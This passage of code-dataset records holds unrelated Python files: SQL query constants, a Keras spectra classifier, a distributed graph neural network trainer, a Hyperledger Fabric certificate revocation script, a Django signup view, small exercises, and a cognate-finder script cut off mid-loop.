+{"seq_id":"598584306","text":"__author__ = 'melaniejiang'\n\nallUsers = \"\"\"\n SELECT idusers, screen_name, name\n FROM users\n \"\"\"\n\nselectUserByIdusers = (\"SELECT * \"\n \"FROM users \"\n \"WHERE idusers = %s\")\n\nselectUserByScreen_name = (\"SELECT * \"\n \"FROM users \"\n \"WHERE screen_name = %s\")\n\nselectTweetsByIdtweets = (\"SELECT idtweets, text \"\n \"FROM tweets \"\n \"WHERE idtweets = %s AND lang = 'en'\")\n\nrangeUsers = (\"SELECT min(idusers), max(idusers) \"\n \"FROM users\")\n\nrangeTweets = (\"SELECT min(idtweets), max(idtweets) \"\n \"FROM tweets\")\n\ninsertUsers = (\"INSERT IGNORE INTO users \"\n \"(idusers,id,screen_name,name,location,description) \"\n \"VALUES (%s,%s,%s,%s,%s,%s)\")\n\ninsertUsers_classified = (\"INSERT IGNORE INTO users_classified \"\n \"(screen_name) \"\n \"VALUES (%s)\")\n\ngetColumnNames = (\"SELECT COLUMN_NAME \"\n \"FROM INFORMATION_SCHEMA.COLUMNS \"\n \"WHERE TABLE_SCHEMA = 'test' AND TABLE_NAME = %s\")\n\nupdateUsers_classified = (\"UPDATE users_classified \"\n \"SET gender = %s \"\n \"WHERE screen_name = %s\")\n\ndescriptionOfGenderedUsers = (\"SELECT id, idusers, description \"\n \"FROM users JOIN users_classified ON (users.screen_name = users_classified.screen_name) \"\n \" AND (users_classified.gender IS NOT NULL)\" )\n\nuser_screen_name_name = (\"SELECT screen_name, name \"\n \"FROM users\")","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"94924923","text":"import pandas as pd\nimport numpy as np\nfrom keras import regularizers\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense,Dropout,Activation,Flatten\nfrom keras.optimizers import SGD\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Conv1D,MaxPooling1D\ndef creat_conv_model():\n model = Sequential()\n model.add(Conv1D(48,11,strides=4,padding='valid',input_shape =(2600,1)))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling1D(pool_size=3,strides=2))\n\n model.add(Conv1D(128,5,strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling1D(pool_size=3,strides=2))\n\n model.add(Conv1D(192,3,strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling1D(pool_size=3,strides=2))\n\n model.add(Flatten())\n model.add(Dense(200,kernel_initializer='glorot_uniform'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(Dense(200,kernel_initializer='glorot_uniform'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(Dense(3,kernel_initializer='glorot_uniform'))\n model.add(BatchNormalization())\n model.add(Activation('softmax'))\n return model\n\ndef read_data_byID(id, filepath):\n with open(filepath +str(id)+'.txt','r') as f:\n for line in f:\n df_star = list(map(float, line.split(',')))\n return df_star\ndef data_pre_process(a):\n #out = np.log10(a - a.min()+1)\n out = ((a - a.min())*100)/(a.max()-a.min())\n #out = medfilt(out)\n return out\ndef read_data(df, filename):\n X_train = np.zeros((df.shape[0],2600),dtype = float)\n for i,id in enumerate(df['id']):\n a = np.array(read_data_byID(id,filename))\n X_train[i,:] =data_pre_process(a)\n if i%1000 == 0:\n print(\"reading %d files\"%i)\n print(X_train[i,:])\n print('Finished reading files')\n return X_train\n\nif __name__ == '__main__':\n filename = '../data/first_train_data_20180131/'\n df = pd.read_csv('../data/train.csv')\n qso = df[df['type']=='qso']\n galaxy = df[df['type']=='galaxy']\n star = df[df['type']=='star']\n frames = [star,galaxy,qso]\n cw = {0:1,1:int(star.shape[0]/galaxy.shape[0]),2:int(star.shape[0]/qso.shape[0])}\n train = pd.concat(frames)\n train = train.sample(frac=1).reset_index(drop=True)\n X_train = read_data(train, filename)\n label = np.array(train['type'])\n y_train = np.zeros_like(label, dtype = int)\n y_train = (label == 'galaxy').astype(int) * 1 + (label == 'qso').astype(int) * 2\n #star =0 galaxy = 1 qso =2\n mean_X = X_train.mean(axis = 0,keepdims = True)\n std_X = X_train.std(axis = 0, keepdims = True)\n X_train = (X_train - mean_X)/(std_X)\n Y_train = (np.arange(3)==y_train[:,None]).astype(int)\n #---------------------training-------------------------------\n lr_rate = 1e-3\n reg = 0.02\n best_accu = 0\n best_model = None\n results = {}\n X_train = X_train.reshape((X_train.shape[0],X_train.shape[1],1))\n model = creat_conv_model()\n optimizer = SGD(lr=lr_rate,decay=1e-6,momentum=0.9,nesterov=True)\n model.compile(loss='categorical_crossentropy',optimizer=optimizer,metrics=['accuracy'])\n model.fit(X_train,Y_train,batch_size=256,epochs=10,shuffle=True,verbose=1,validation_split=0.2,class_weight = cw)\n #------------------------------------------------------------\n\n #------------------Saving---------------------\n Version = '0.0.1'\n model.save('3_classfier_unknown_model_ver'+Version+'.h5')\n np.save('mean_X_3_classfier_unknown_model_ver'+Version+'.npy',mean_X)\n np.save('std_X_3_classfier_unknown_model_ver'+Version+'.npy',std_X)\n #---------------------------------------------\n","sub_path":"src/3classfier.py","file_name":"3classfier.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"645757263","text":"# config obj - http://www.gawel.org/docs/ConfigObject/\nfrom ConfigObject import config_module\n\n# singleton flag\n__initialized__ = False\n\n# do init\nif __initialized__ is False:\n # init config obj\n config_module(__name__, __file__, *['config.ini'])\n # update flag\n __initialized__ = True\n","sub_path":"odata/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111066686","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 16:11:20 2021\n\n@author: worldofgoo9\n\"\"\"\n# MyPaGraph Test\nimport os\nimport argparse\nimport sys\nimport MyPaGraph as pg\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport dgl.function as fn\nimport dgl\nfrom dgl.data import CoraGraphDataset, CiteseerGraphDataset, PubmedGraphDataset\nfrom dgl.data import RedditDataset\nfrom dgl.data import register_data_args\nimport time\nimport torch.multiprocessing as mp\nimport networkx as nx\n#import matplotlib.pyplot as plt\n#from utils import thread_wrapped_func\nfrom torch.nn.parallel import DistributedDataParallel\nfrom multiprocessing import freeze_support\nimport multiprocessing as mpr\n\n\nclass MyGraphConv(nn.Module):\n def __init__(self, in_feats, out_feats, activation = F.relu):\n super(MyGraphConv,self).__init__()\n self.W = nn.Linear(in_feats * 2, out_feats)\n self.activation = activation\n \n def forward(self, block, h):\n # with g.local_scope():\n with block.local_scope():\n # g.ndata['h'] = h\n h_src = h\n h_dst = h[:block.number_of_dst_nodes()]\n block.srcdata['h'] = h_src\n block.dstdata['h'] = h_dst\n\n # g.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_neigh'))\n block.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_neigh'))\n\n # return self.W(torch.cat([g.ndata['h'], g.ndata['h_neigh']], 1))\n return self.activation(self.W(torch.cat(\n [block.dstdata['h'], block.dstdata['h_neigh']], 1)))\n\n\nclass MyGCN(nn.Module):\n #This GCN model is using sampling method\n def __init__(self,\n in_feats,\n n_hidden,\n n_classes,\n n_layers,\n activation=F.relu,\n dropout=0.5,\n g = None\n ):\n super(MyGCN, self).__init__()\n #self.g = g\n assert g is None,\"Remind that sampling method do not need Graph g\"\n \n self.layers = nn.ModuleList()\n # input layer\n if(n_layers==1):\n self.layers.append(MyGraphConv(in_feats, n_classes, activation=activation))\n else:\n self.layers.append(MyGraphConv(in_feats, n_hidden, activation=activation))\n # hidden layers\n for i in range(n_layers - 2):\n self.layers.append(MyGraphConv(n_hidden, n_hidden, activation=activation))\n \n # output layer\n self.layers.append(MyGraphConv(n_hidden, n_classes,activation=activation)) \n #self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, blocks, h):\n assert len(blocks)==len(self.layers),\\\n \"Numbers of blocks and layers should be equal\"\n assert blocks[0].number_of_src_nodes()==len(h),\\\n \"Number of src nodes should be equal to number of features(h)\"\n #h = features\n \n #forward:\n for i, layer in enumerate(self.layers):\n '''\n if i != 0:\n h = self.dropout(h)\n #if use dropout\n ''' \n h = layer(blocks[i], h)\n return h \n \ndef train(procid,args):\n # load and preprocess dataset\n assert procid >= 0\n os.environ['MASTER_ADDR'] = args.MASTER_ADDR \n os.environ['MASTER_PORT'] = args.MASTER_PORT\n \n if args.dataset == 'cora':\n data = CoraGraphDataset()\n elif args.dataset == 'citeseer':\n data = CiteseerGraphDataset()\n elif args.dataset == 'pubmed':\n data = PubmedGraphDataset()\n elif args.dataset == 'reddit':\n data = RedditDataset()\n else:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n\n g = data[0]\n \n \n #data = args.data\n #g = args.data[0]\n #g.create_formats_()\n print(\"New Proc! \",procid)\n #return g\n device = torch.device(args.devices_name_list[procid])\n torch.cuda.set_device(device)\n dist_init_method = 'tcp://{master_ip}:{master_port}'.format(\n master_ip=args.MASTER_ADDR, master_port=args.MASTER_PORT)\n world_size = args.ngpus\n torch.distributed.init_process_group(backend=\"nccl\",\n init_method=dist_init_method,\n world_size = world_size,\n rank = procid)\n #torch.cuda.set_device(device)\n#st = pg.Storage(g,[device],[args.PV_list[procid]],[args.TV_list[procid]])\n \n\n # use pagraph \n st = pg.Storage(g=g,data=g.ndata,cache_rate=args.cache_rate,\n nodes=args.PV_list[procid],gpu=args.devices_name_list[procid],cpu='cpu')\n if(True):\n features = g.ndata.pop('feat')\n labels = g.ndata.pop('label')\n train_mask = g.ndata.pop('train_mask')\n val_mask = g.ndata.pop('val_mask')\n test_mask = g.ndata.pop('test_mask')\n in_feats = features.shape[1]\n n_classes = data.num_labels\n n_edges = data.graph.number_of_edges()\n \n print(\"\"\"----Data statistics------'\n #Edges %d\n #Classes %d\n #Train samples %d\n #Val samples %d\n #Test samples %d\"\"\" %\n (n_edges, n_classes,\n train_mask.int().sum().item(),\n val_mask.int().sum().item(),\n test_mask.int().sum().item()))\n \n del features #release memory \n\n # add self loop\n '''\n if args.self_loop:\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n\n '''\n # create GCN model\n model = MyGCN(\n in_feats,\n args.n_hidden,\n n_classes,\n args.n_layers,\n F.relu,\n args.dropout,\n \n )\n model = model.to(device)\n model = DistributedDataParallel(model, device_ids=[device],output_device=device) #device_ids = [device], output_device = device\n \n # set sampler\n fanouts=[]\n for i in range(args.n_layers):\n fanouts.append(args.neighbor_number)\n '''\n example: fanout=[2,2,2,2] or [3,3,3] ...\n '''\n sampler = dgl.dataloading.MultiLayerNeighborSampler(fanouts) \n train_nids = args.TV_list[procid]\n dataloader = dgl.dataloading.NodeDataLoader( \n g, train_nids, sampler,\n batch_size=args.batch_size,\n shuffle=False,\n drop_last=True,\n num_workers=0)\n \n # set loss function\n loss_fcn = torch.nn.CrossEntropyLoss()\n\n # use optimizer\n optimizer = torch.optim.Adam(model.parameters(),\n lr = args.lr)\n\n # initialize graph\n dur = []\n \n \n # Sync\n #if(args.ngpus > 1):\n # torch.distributed.barrier() \n \n #Start trainning\n model.train()\n \n for epoch in range(args.n_epochs):\n # time record\n #if epoch >= 3:\n tS=[0.0,0.0,0.0,0.0,0.0,0.0]\n t0 = time.time()\n \n # forward\n\n #Loss=torch.tensor([0.0],device=device,required_grad=False)\n \n for count,(in_nodes,out_nodes,blocks) in enumerate(dataloader):\n \n t1=time.time()\n blocks=[b.to(device) for b in blocks]\n \n t2=time.time()\n feat_in = st.Query(fname='feat',nodes=in_nodes)\n labels_out = st.Query(fname='label',nodes=out_nodes)\n \n\n t3=time.time()\n # forward\n feat_out = model(blocks,feat_in)\n t4=time.time()\n \n loss = loss_fcn(feat_out,labels_out)\n #Loss=Loss+loss.detach()\n t5=time.time()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n t6=time.time()\n \n tS[1]=tS[1]+t2-t1\n tS[2]=tS[2]+t3-t2\n tS[3]=tS[3]+t4-t3\n tS[4]=tS[4]+t5-t4\n tS[5]=tS[5]+t6-t5\n \n \n\n \n tE=time.time()\n #logits = model(features)\n #loss = loss_fcn(logits[train_mask], labels[train_mask])\n #optimizer.zero_grad()\n #loss.backward()\n #optimizer.step()\n\n #if epoch >= 3:\n dur.append(time.time() - t0)\n\n acc = 0.0 #evaluate(model, features, labels, val_mask)\n if(procid>=0):\n print(\"Epoch {:05d} | Time(s) {:.4f} | Loss {:.4f} | Accuracy {:.4f} | \"\n \"ETputs(KTEPS) {:.2f}\". format(epoch, np.mean(dur), loss.item(),\n acc, n_edges / np.mean(dur) / 1000))\n #for i in range(1,6):\n print(tS[1:],'\\nTotal:',tE-t0,\" s \")\n \n \n #Finish trainning\n \n # Sync\n #if(args.ngpus > 1000):\n # torch.distributed.barrier()\n model.eval()\n time.sleep(3)\n\n print(\"____________________________\")\n #acc = evaluate(model, features, labels, test_mask)\n #print(\"Test accuracy {:.2%}\".format(acc))\n \n\n\n\nif __name__ == '__main__':\n \n freeze_support()\n\n parser = argparse.ArgumentParser(description='GCN')\n register_data_args(parser)\n parser.add_argument(\"--data\", type=str, default=\"pubmed\",\n help=\"Dataset\")\n parser.add_argument(\"--dropout\", type=float, default=0.5,\n help=\"dropout probability\")\n parser.add_argument(\"--ngpus\", type=int, default=-1,\n help=\"gpu\")\n parser.add_argument(\"--lr\", type=float, default=1e-2,\n help=\"learning rate\")\n parser.add_argument(\"--n-epochs\", type=int, default=4,\n help=\"number of training epochs\")\n parser.add_argument(\"--n-hidden\", type=int, default=16,\n help=\"number of hidden gcn units\")\n parser.add_argument(\"--n-layers\", type=int, default=1,\n help=\"number of hidden gcn layers\")\n parser.add_argument(\"--hop\", type=int, default=1,\n help=\"number hop\")\n parser.add_argument(\"--weight-decay\", type=float, default=5e-4,\n help=\"Weight for L2 loss\")\n parser.add_argument(\"--self-loop\", action='store_true',\n help=\"graph self-loop (default=False)\")\n parser.add_argument(\"--batch-size\", type=int, default=1024,\n help=\"number of batch size\")\n parser.add_argument(\"--neighbor-number\", type=int, default=5,\n help=\"number of neighbor\")\n parser.add_argument(\"--cache-rate\", type=float, default=0.5,\n help=\"Cache rate\")\n\n args = parser.parse_args()\n args.MASTER_ADDR = '127.0.0.1'\n args.MASTER_PORT = '23456'\n args.dataset=args.data\n args.devices_name_list = ['cuda:0','cuda:1','cuda:2','cuda:3']\n if(args.ngpus > 0):\n args.devices_name_list=[]\n for i in range(args.ngpus):\n args.devices_name_list.append('cuda:'+str(i))\n else:\n args.ngpus=len(args.devices_name_list)\n \n print(\"args: \\n\",args)\n \n os.environ['MASTER_ADDR'] = args.MASTER_ADDR \n os.environ['MASTER_PORT'] = args.MASTER_PORT\n if args.dataset == 'cora':\n data = CoraGraphDataset()\n elif args.dataset == 'citeseer':\n data = CiteseerGraphDataset()\n elif args.dataset == 'pubmed':\n data = PubmedGraphDataset()\n elif args.dataset == 'reddit':\n data = RedditDataset()\n else:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n\n g = data[0]\n\n\n args.TV_list,args.PV_list=pg.Init.DivideGraph(g,args.ngpus,args.n_layers)\n \n #assert 1==0,\"Stop\"\n \n # release memory\n del data\n del g\n\n mp.spawn(train,nprocs = args.ngpus,args = (args,))\n \n print(\"Exit!\")\n \n","sub_path":"TrainMul.py","file_name":"TrainMul.py","file_ext":"py","file_size_in_byte":11716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"262324631","text":"#! /usr/bin/python3\n# Uses python3\nimport math\n\n\ndef optimal_summands(n):\n y = int(((-1+math.sqrt(1+8*n))//2)-1)\n #print(y)\n sum1=int((y*(y+1))/2)\n z=n-sum1\n print(y+1)\n for i in range(1,y+1):\n print(i,end =' ')\n print(z)\n #return True\n\nif __name__ == '__main__':\n #input = sys.stdin.read()\n n = int(input())\n optimal_summands(n)\n #print(len(summands))\n #for x in summands:\n # print(x, end=' ')\n","sub_path":"Algo Course 1/week3_greedy_algorithms/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"118619045","text":"\"\"\"\nwrite a function that reads from roster.txt prints the following information to the command line:\na. how many **FIRST** names contain the letter ‘e’\nb. then lists the FIRST names which contain the letter ‘e’\n\"\"\"\n##go in and print it all in a list, and then separate the ones that are /n and ' '\nimport os\n\ndef read_roster_first_e():\n count = 0\n index = 0\n with open('roster.txt') as roster:\n name_list = roster.read().splitlines()\n first_name_list = [i.split(' ', 1)[0] for i in name_list]\n first_name_list_e = []\n try:\n if 'e' in first_name_list[index]:\n first_name_list_e[count] = first_name_list_e + first_name_list_e[count]\n count = count + 1\n index = index + 1\n except ValueError:\n index = index + 1\n else:\n index = index + 1\n ##I Don't know why this doesn't work :(\n\n print(first_name_list_e)\n print(\"There are \" + str(count) + \" people with e in their name. That's a lot of e's!\")\n \n #exercise 4\n sample_file = open('D06ex03.txt', 'w')\n sample_file.write(str(first_name_list_e))\n sample_file.close()\n\n\ndef main():\n read_roster_first_e()\n\n\nif __name__ == '__main__':\n main()\n ","sub_path":"D06ex03.py","file_name":"D06ex03.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"508149621","text":"import base64\nimport copy\nimport json\nimport os\nimport time\nimport subprocess\n\nimport requests\n\nfrom conf import conf\nfrom subprocess import call, check_output, STDOUT, CalledProcessError, Popen\n\n\ndef revokeFabricUserAndGenerateCRL(org_name, username):\n org = conf['orgs'][org_name]\n org_admin_home = org['admin_home']\n\n print(\n 'Revoking the user \\'%(username)s\\' of the organization \\'%(org_name)s\\' with Fabric CA Client home directory set to %(org_admin_home)s and generating CRL ...' % {\n 'username': username,\n 'org_name': org_name,\n 'org_admin_home': org_admin_home\n }, flush=True)\n\n call(['fabric-ca-client',\n 'revoke', '-d',\n '-c', '/data/orgs/' + org_name + '/admin/fabric-ca-client-config.yaml',\n '--revoke.name', username,\n '--gencrl'])\n\n\ndef fetchConfigBlock(org_name, peer):\n org = conf['orgs'][org_name]\n\n org_admin_home = org['admin_home']\n org_admin_msp_dir = org_admin_home + '/msp'\n channel_name = conf['misc']['channel_name']\n orderer = conf['orderers']['orderer']\n config_block_file = conf['misc']['config_block_file']\n\n print('Fetching the configuration block of the channel \\'%s\\'' % channel_name, flush=True)\n\n # update config path for using right core.yaml\n os.environ['FABRIC_CFG_PATH'] = '/conf/' + org_name + '/' + peer['name']\n # update mspconfigpath for getting the one in /data\n os.environ['CORE_PEER_MSPCONFIGPATH'] = org_admin_msp_dir\n\n call(['peer', 'channel', 'fetch', 'config', config_block_file,\n '-c', channel_name,\n '-o', '%(host)s:%(port)s' % {'host': orderer['host'], 'port': orderer['port']},\n '--tls',\n '--clientauth',\n '--cafile', orderer['tls']['certfile'],\n '--keyfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.key',\n '--certfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.crt'\n ])\n\n # clean env variables\n del os.environ['FABRIC_CFG_PATH']\n del os.environ['CORE_PEER_MSPCONFIGPATH']\n\n\ndef createConfigUpdatePayloadWithCRL(org_name):\n org = conf['orgs'][org_name]\n org_admin_home = org['admin_home']\n org_admin_msp_dir = org_admin_home + '/msp'\n\n channel_name = conf['misc']['channel_name']\n config_block_file = conf['misc']['config_block_file']\n\n print('Creating config update payload with the generated CRL for the organization \\'%s\\'' % org_name, flush=True)\n\n # Start the configtxlator\n # call('configtxlator start &', shell=True)\n proc = Popen('configtxlator start &', shell=True)\n\n print('Sleeping 5 seconds for configtxlator to start...', flush=True)\n call(['sleep', '5'])\n\n CTLURL = 'http://127.0.0.1:7059'\n # Convert the config block protobuf to JSON\n r = requests.post(CTLURL + '/protolator/decode/common.Block', data=open(config_block_file, 'rb').read())\n config_block = r.json()\n\n # Extract the config from the config block\n config = config_block['data']['data'][0]['payload']['data']['config']\n\n # Update crl in the config json\n updated_config = copy.deepcopy(config)\n with open(org_admin_msp_dir + '/crls/crl.pem', 'rb') as f:\n crl = base64.b64encode(f.read()).decode('utf8')\n updated_config['channel_group']['groups']['Application']['groups'][org_name]['values']['MSP']['value'][\n 'config']['revocation_list'] = [crl]\n\n # Create the config diff protobuf\n r = requests.post(CTLURL + '/protolator/encode/common.Config', json=config, stream=True)\n config_pb = None\n if r.status_code == 200:\n config_pb = r.content\n else:\n print(r.text, flush=True)\n\n r = requests.post(CTLURL + '/protolator/encode/common.Config', json=updated_config, stream=True)\n updated_config_pb = None\n if r.status_code == 200:\n updated_config_pb = r.content\n else:\n print(r.text, flush=True)\n\n r = requests.post(CTLURL + '/configtxlator/compute/update-from-configs', data={'channel': channel_name},\n files={'original': config_pb, 'updated': updated_config_pb})\n config_update_pb = None\n if r.status_code == 200:\n config_update_pb = r.content\n else:\n print(r.text, flush=True)\n\n # call(['curl', '-X', 'POST', '--data-binary', '@config.json', CTLURL + '/protolator/encode/common.Config', '>', '/tmp/config.pb'])\n # call(['curl', '-X', 'POST', '--data-binary', '@updated_config.json', CTLURL + '/protolator/encode/common.Config', '>', '/tmp/updated_config.pb'])\n # call(['curl', '-X', 'POST', '-F', 'original=@config.pb', '-F', 'updated=@updated_config.pb', CTLURL + '/configtxlator/compute/update-from-configs', '-F', 'channel=' + channel_name, '>', '/tmp/config_update.pb'])\n\n # Convert the config diff protobuf to JSON\n r = requests.post(CTLURL + '/protolator/decode/common.ConfigUpdate', data=config_update_pb, stream=True)\n config_update = {}\n if r.status_code == 200:\n config_update = r.json()\n else:\n print(r.text, flush=True)\n # call(['curl', '-X', 'POST', '--data-binary', '@config_update.pb', CTLURL + '/protolator/decode/common.ConfigUpdate', '>', '/tmp/config_update.json'])\n\n # Create envelope protobuf container config diff to be used in the \"peer channel update\" command to update the channel configuration block\n config_update_as_envelope = {\n 'payload': {\n 'header': {\n 'channel_header': {\n 'channel_id': channel_name,\n 'type': 2,\n }\n },\n 'data': {\n 'config_update': config_update\n }\n }\n }\n\n r = requests.post(CTLURL + '/protolator/encode/common.Envelope', json=config_update_as_envelope)\n if r.status_code == 200:\n with open(conf['misc']['config_update_envelope_file'], 'wb') as f:\n for chunk in r:\n f.write(chunk)\n else:\n print(r.text, flush=True)\n # echo '{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"'\"${CHANNEL_NAME}\"'\", \"type\":2}},\"data\":{\"config_update\":'$(cat config_update.json)'}}}' > config_update_as_envelope.json\n # curl -X POST --data-binary @config_update_as_envelope.json $CTLURL/protolator/encode/common.Envelope > $CONFIG_UPDATE_ENVELOPE_FILE\n\n # Stop configtxlator\n proc.kill()\n\n\ndef updateConfigBlock(org_name, peer):\n org = conf['orgs'][org_name]\n org_admin_home = org['admin_home']\n org_admin_msp_dir = org_admin_home + '/msp'\n\n channel_name = conf['misc']['channel_name']\n orderer = conf['orderers']['orderer']\n config_update_envelope_file = conf['misc']['config_update_envelope_file']\n\n # update config path for using right core.yaml\n os.environ['FABRIC_CFG_PATH'] = '/conf/' + org_name + '/' + peer['name']\n # update mspconfigpath for getting the one in /data\n os.environ['CORE_PEER_MSPCONFIGPATH'] = org_admin_msp_dir\n\n print('Updating the configuration block of the channel \\'%s\\'' % channel_name, flush=True)\n call(['peer', 'channel', 'update',\n '-f', config_update_envelope_file,\n '-c', channel_name,\n '-o', '%(host)s:%(port)s' % {'host': orderer['host'], 'port': orderer['port']},\n '--tls',\n '--clientauth',\n '--cafile', orderer['tls']['certfile'],\n '--keyfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.key',\n '--certfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.crt'\n ])\n\n # clean env variables\n del os.environ['FABRIC_CFG_PATH']\n del os.environ['CORE_PEER_MSPCONFIGPATH']\n\n\ndef queryAsRevokedUser(arg, org_name, peer, username):\n org = conf['orgs'][org_name]\n org_user_home = org['user_home']\n org_user_msp_dir = org_user_home + '/msp'\n\n # update config path for using right core.yaml\n os.environ['FABRIC_CFG_PATH'] = '/conf/' + org_name + '/' + peer['name']\n # update mspconfigpath for getting one in /data\n os.environ['CORE_PEER_MSPCONFIGPATH'] = org_user_msp_dir\n\n def clean_env_variables():\n del os.environ['FABRIC_CFG_PATH']\n del os.environ['CORE_PEER_MSPCONFIGPATH']\n\n channel_name = conf['misc']['channel_name']\n chaincode_name = conf['misc']['chaincode_name']\n\n print(\n 'Querying the chaincode in the channel \\'%(CHANNEL_NAME)s\\' on the peer \\'%(PEER_HOST)s\\' as revoked user \\'%(USER_NAME)s\\' ...' % {\n 'CHANNEL_NAME': channel_name,\n 'PEER_HOST': peer['host'],\n 'USER_NAME': username,\n }, flush=True)\n\n starttime = int(time.time())\n\n # Continue to poll until we get a successful response or reach QUERY_TIMEOUT\n while int(time.time()) - starttime < 15: # QUERY_TIMEOUT\n call(['sleep', '1'])\n\n try:\n check_output(['peer', 'chaincode', 'query',\n '-C', channel_name,\n '-n', chaincode_name, '-c', arg],\n stderr=STDOUT).decode()\n except CalledProcessError as e:\n output = e.output.decode()\n # uncomment for debug\n if 'access denied' in output:\n print(\n 'Expected error occurred when the revoked user \\'%(username)s\\' queried the chaincode in the channel \\'%(channel_name)s\\'\\n' % {\n 'channel_name': channel_name,\n 'username': username,\n }, flush=True)\n # clean env variables\n clean_env_variables()\n return True\n else:\n print('.', flush=True, end='')\n\n err_msg = 'The revoked user %(username)s should have failed to query the chaincode in the channel \\'%(channel_name)s\\'' % {\n 'channel_name': channel_name,\n 'username': username\n }\n print(err_msg, flush=True)\n # clean env variables\n clean_env_variables()\n return False\n\n\ndef revokeFirstOrgUser():\n # Revoke the user and generate CRL using admin's credentials\n org_name = 'owkin'\n org = conf['orgs'][org_name]\n username = org['users']['user']['name']\n peer = org['peers'][0]\n\n revokeFabricUserAndGenerateCRL('owkin', username)\n\n # Fetch config block\n fetchConfigBlock(org_name, peer)\n\n # Create config update envelope with CRL and update the config block of the channel\n createConfigUpdatePayloadWithCRL('owkin')\n updateConfigBlock(org_name, peer)\n\n return queryAsRevokedUser('{\"Args\":[\"queryObjects\", \"problem\"]}', org_name, peer, username)\n\n\ndef run():\n res = True\n\n # Revoke first org user\n res = res and revokeFirstOrgUser()\n\n if res:\n print('Congratulations! User has been correctly revoked', flush=True)\n call(['touch', conf['misc']['run_success_revoke_file']])\n else:\n print('User revokation failed failed.', flush=True)\n call(['touch', conf['misc']['run_fail_revoke_file']])\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"python-scripts/revoke.py","file_name":"revoke.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"495084949","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom.forms import UserRegisterForm\n\n# Create your views here.\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Account created for {username}!')\n return redirect('blog-home')## Gibt eine HttpResponseRedirect an die entsprechende URL für die übergebenen Argumente zurück\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form}) ## render (), um die HttpResponse zu erstellen, die an den Browser zurückgesendet wird\n\n\n\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440944930","text":"from PyDictionary import PyDictionary\r\ndictionary= PyDictionary()\r\nfrom pylev import pylev\r\nimport difflib\r\nimport sys\r\n#from difflib_data import*\r\n\r\n#BeautifulSoup(html, \"html.parser\")\r\n\r\n#class DevNull:\r\n #def write(self, msg):\r\n #pass\r\n#sys.stderr = DevNull()\r\nimport goslate\r\ngs = goslate.Goslate()\r\nprint(gs.translate('hello world', 'fr'))\r\n\r\nenglish= input(\"Put in an english word for the translation and a cognate: \")\r\nfrench= gs.translate(english, 'fr')\r\n\r\n#french= input(\"Put in a french word for an english cognate: \")\r\n\r\n\r\n##french translation\r\n\r\n##########wishful thiinking! CANNNN BEE SALVAGED!##\r\n#english= input(\"Put in an english word for the translation and a cognate: \")\r\n#print (dictionary.meaning(english))\r\n#dictionary.translate(english,'fr')\r\n#french= dictionary.translate(english,'fr')\r\n\r\n\r\n\r\n\r\nliresults=[]\r\nwith open('wordsEng.txt', 'r')as inputfile:\r\n for line in inputfile:\r\n liresults.append(line.strip().split(','))\r\n #print (liresults)\r\n\r\nwords = [[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]]\r\nfor result in liresults: \r\n words[ord(result[0][0])-ord('a')].append(result[0])\r\n\r\n\r\n\r\n\r\n\r\n########time to start the comparisons\r\n\r\nformerdistance=30\r\n#open the list with the matching first letter and begin the comparison\r\ncandidates= []\r\nfor word in words[(ord(french[0])-ord('a'))]:\r\n # get the distance from your word\r\n distance = pylev.levenshtein(french, word)\r\n # if the edit distance is less than the lowest edit distance\r\n if distance< formerdistance:\r\n # set the lowest edit distance to be this edit distance\r\n formerdistance=distance\r\n # add this word to a NEW list of candidates (as opposed to the old list)\r\n candidates=[word]\r\n # if the edit distance is equal to the lowest edit distance\r\n elif distance==formerdistance: \r\n # add this word to the current list of candidates\r\n 